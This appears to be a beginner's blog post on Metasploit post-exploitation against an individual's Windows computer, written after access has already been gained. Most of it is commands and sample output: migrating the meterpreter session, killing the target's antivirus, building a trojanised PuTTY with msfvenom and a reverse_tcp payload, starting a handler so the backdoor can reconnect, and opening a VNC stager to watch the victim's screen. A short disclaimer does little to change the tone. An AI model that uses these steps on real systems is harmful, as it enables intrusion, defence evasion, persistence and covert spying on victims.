What to do after getting into the system ???

Hello you all amazing hackers #xssrat

Before starting do not use this knowledge to harm people this is not good and also it can backfire on you. In this, we will attack an individual.

why I am making this: In the beginning, when we start hacking there will be a lot of people who will tell you how to exploit a Windows or Linux system but after exploiting what should you do??. No one till you so today you will learn what to do after exploiting and how to do it. I will be heavily focusing on MSF for this. #If I forgot something please let me know#This is my first write up I hope you like it.

Topics :

1.Scan the network :

You can scan a network by Nmap or more tools like it. We also can scan the network inside MSF by Nmap. When we finish the scan we can try to go after new users.

msf > db_drive

msf > db_connect

msf > db_nmap

Now you can show your Nmap skills in this.

2.Migrating the exploit :

After we exploit the system user can close the session by just closing the app or browser and then we will lose ower session to the target. so to avoid this we will migrate to another process in the system. You should use a process that is open for a long time.

meterpreter > run post/windows/manage/migrate

[*] Running module against V-MAC-XP

[*] Current server process: revterp.exe (243)

[*] Migrating to explorer.exe…

[*] Migrating into process ID 816

[*] New server process: Explorer.EXE (811)

3.kill antivirus :

Antivirus is the software that can give us trouble in the future when we try to install ower backdoors into the system. we will kill him just by using some command.

meterpreter > run killav

[*] Killing Antivirus services on the target…

[*] Killing off cmd.exe…

[*] Killing off cmd.exe…

4.Install backdoor:

The backdoor will help us to reconnect to the system even if we lose session to the target. To install a backdoor we need to download a backdoor first.

i.Backdoor: wget http://the.earth.li/~sgtatham/putty/0.63/x86/putty.exe (put this in your root file)

ii.msf exploit : msfvenom -p windows/meterpreter/reverse_tcp -f exe -e x86/shikata_ga_nai -i 25 -k -x /root/putty.exe LHOST=IP LPORT=PORT > evilputty.exe

iii.start msfconsole

iv.use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set LHOST IP

set LPORT PORT

exploit

5.Watch user :

After doing all this on up we will watch the user what he,she&other is doing. It little creepy to watch other if don’t want to do this it’s your choice # don’t do anything harmful to others.

meterpreter > run vnc

[*] Creating a VNC reverse tcp stager: LHOST=IPLPORT=PORT)

[*] Running payload handler

[*] VNC stager executable 37888 bytes long

[*] Uploaded the VNC agent to C:\WINDOWS\TEMP\CTDWtQC.exe (must be deleted manually)

[*] Executing the VNC agent with endpoint IP: PORT…

[*] VNC Server session 2 opened (IP:PORT -> IP:PORT)

#end

If you want to learn more about MSF than read this book it will help you a lot :

Metasploit The Penetration Tester’s Guide:

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store